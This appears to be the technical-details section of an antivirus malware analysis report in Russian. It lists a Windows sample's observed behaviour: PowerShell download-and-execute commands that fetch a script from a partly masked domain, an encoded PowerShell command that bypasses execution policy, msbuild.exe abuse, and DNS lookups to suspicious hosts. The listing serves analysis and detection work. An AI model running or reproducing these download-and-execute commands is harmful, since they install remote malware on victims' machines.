Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://lu##.world/parse.jpg')
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- http://lu##.world/parse.jpg
- http://pa##e.ee/r/C4FP6/0
- DNS ASK lu##.world
- DNS ASK pa##e.ee
- DNS ASK su#####yat.duckdns.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://lu##.world/parse.jpg')' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -w 1 /e JAB2AGMAbgB5AEQAcgBOAEoAIAA9ACAAKAAnAHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACcALQBmACcAZABTAHQAJwAsACcAcgBpAG4AJwAsABwgYABEAGAAbwBgAHcAbgBgAGwAYABvAGEAHSAsACcAZwAnACkAO...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'